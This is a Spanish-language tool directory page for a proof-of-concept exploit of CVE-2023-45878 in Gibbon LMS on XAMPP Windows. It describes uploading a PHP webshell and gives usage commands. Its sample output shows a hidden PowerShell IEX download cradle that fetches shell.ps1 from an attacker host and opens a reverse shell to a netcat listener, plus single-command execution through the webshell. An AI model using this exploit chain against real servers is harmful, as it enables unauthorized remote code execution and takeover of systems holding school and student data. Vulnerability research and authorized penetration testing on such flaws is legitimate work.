Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-45878-POC — PoC de CVE-2023-45878 para Gibbon LMS en XAMPP Windows | Kitploit
Herramientas/GitHubGitHub/pauldhaes/cve-2023-45878-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubpauldhaes/cve-2023-45878-poc

CVE-2023-45878-POC

PoC de CVE-2023-45878 para Gibbon LMS en XAMPP Windows

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-45878-POC

CVE-2023-45878 poc para Gibbon LMS en XAMPP Windows. Sube una webshell llamada shell.php para inyección de comandos. Para reverse shell, sube un script ps1 de PowerShell reverse shell llamado shell.ps1 que se carga en la máquina objetivo usando shell.php.

Requisitos

Python3 Módulo requests de python3 netcat

root@kitploit:~
pip3 install requests

Entorno virtual

root@kitploit:~
mkdir CVE-2023-45878
cd CVE-2023-45878
python3 -m venv CVE
source CVE/bin/activate
cd ..
pip3 install requests

Uso

Probado en Gibbon LMS que se ejecutaba en XAMPP Windows sin antivirus habilitado. El objetivo se puede encontrar usando la página de inicio de sesión de Gibbon, por ejemplo http://gibbon-example/Gibbon-LMS/

Shell inversa

root@kitploit:~
python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT

Resultado

root@kitploit:~
[+] PHP shell uploaded successfully to http://target/shell.php
[+] PowerShell reverse shell script saved to: shell.ps1
[+] The shell is now hosted at shell.ps1
Starting reverse shell listener in background...
Starting netcat listener on ip:REV-PORT...
[+] HTTP server running in the background on port SRVPORT
[+] Executing PHP shell to download and execute shell.ps1
Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29
[+] HTTP server started on http://0.0.0.0:SRVPORT/
TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 -
Connection from TARGET-IP

PS C:\xampp\htdocs\Gibbon-LMS>

Comando único

root@kitploit:~
python3 reverse.py --single -target_url http://target -command whoami

Resultado

root@kitploit:~
[+] PHP shell uploaded successfully to http://target/shell.php
[+] Executing PHP command
Executing: http://target/shell.php?whoami
[+] Command executed successfully pres enter
vuln\w.webservice

Créditos

https://herolab.usd.de/security-advisories/usd-2023-0025/

Descargar herramienta